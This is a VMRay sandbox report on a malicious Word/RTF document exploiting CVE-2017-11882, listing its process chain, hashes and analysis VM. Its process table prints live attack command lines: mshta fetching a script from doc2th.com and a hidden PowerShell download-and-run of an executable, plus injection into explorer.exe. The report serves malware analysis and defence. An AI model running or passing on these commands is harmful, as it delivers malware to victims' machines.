RTF Document Takes Advantage of CVE-2017-11882 Vulnerability | VMRay Analyzer Report
Analysis Information
Creation Time: 2017-12-20 15:26 (UTC+1)
VM Analysis Duration Time: 00:02:20
Execution Successful: True
Sample Filename: WhitePaper.doc
Command Line Parameters: False
Prescript: False
Number of Processes: 9
Termination Reason: Timeout
Reputation Enabled: True
VTI Information
VTI Score: 100 / 100
VTI Database Version: 2.6
VTI Rule Match Count: 36
VTI Rule Type: Documents
Tags
#CVE #Malware
Remarks
Critical The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.
Critical The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.
Monitored Processes
ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID
#1 | 0x95c | Analysis Target | Medium | winword.exe | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" | -
#2 | 0x9f4 | RPC Server | Medium | eqnedt32.exe | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | #1
#3 | 0xa18 | Child Process | Medium | mshta.exe | mShta http://doc2th.com/tin/foobaz.txt &AAAAC | #2
#5 | 0xb44 | Child Process | Medium | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe');C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe | #3
#6 | 0xb84 | Child Process | Medium | lambdoidtegument.exe | "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe" | #5
#7 | 0x610 | Injection | Medium | explorer.exe | C:\Windows\Explorer.EXE | #6
#8 | 0xbd4 | Child Process | Medium | cmmon32.exe | "C:\Windows\System32\cmmon32.exe" | #7
#9 | 0xc80 | Child Process | Medium | cmd.exe | /c del "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe" | #8
#11 | 0xce4 | Child Process | Medium | firefox.exe | "C:\Program Files\Mozilla Firefox\Firefox.exe" | #8
Sample Information
ID: #20883
MD5 Hash Value: 30926dda00ebf82f1355217d4285980f
SHA1 Hash Value: d1b8a2414232fbeb997dcb4fdc1d9969137a5445
SHA256 Hash Value: 1c0a1a7c695d5e1a7497b7fa4f75cf83f12265eaca2297b3d72461d110fcb079
Filename: WhitePaper.doc
File Size: 8.48 KB (8685 bytes)
File Type: Word Document
Has VBA Macros: False
Analyzer and Virtual Machine Information
Analyzer Version: 2.2.0
Analyzer Build Date: 2017-12-15 17:49
Microsoft Office Version: 2013
Microsoft Word Version: 15.0.4569.1504
Internet Explorer Version: 8.0.7601.17514
Chrome Version: 58.0.3029.110
Firefox Version: 25.0
Flash Version: 10.3.183.90
Java Version: 7.0.600
VM Name: win7_32_sp1-mso2013
VM Architecture: x86 32-bit PAE
VM OS: Windows 7
VM Kernel Version: 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)